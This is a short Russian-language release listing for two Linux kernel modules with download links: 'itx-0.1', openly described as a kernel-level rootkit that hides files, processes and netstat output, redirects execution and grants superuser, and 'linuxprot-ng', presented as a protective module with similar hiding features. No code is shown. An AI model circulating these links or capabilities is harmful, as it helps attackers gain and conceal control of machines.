|
1. itx-0.1: Linux руткит уровня ядра
|
- скрытие файлов
- скрытие процессов
- редирект обращения к файлам
- редирект исполнения программ
- имитация удаления файла
- запрет на обращение к файлам
- запрет на запуск программ
- скрытие вывода команды netstat
- переход в режим суперпользователя
Ссылка для загрузки:
http://satanic.easycoding.org/release/itx-0.1.tgz
|
|
2. linuxprot-ng: простой LKM модуль для защиты системы
|
- запрет на обращение к файлам и запуск программ
- скрытие файлов и процессов
- перенаправление обращения к файлам и запуска программ
- перевод файла в режим read-only
- перевод файла в режим append-only
- защита процессов от отправки сигналов
- запрет смены uid и gid на определенное значение
- создание исключений из правил
- защита паролем доступа к настройкам
- управление с помощью фиктивной программы
Ссылка для загрузки:
http://satanic.easycoding.org/release/linuxprot-ng.tgz
|
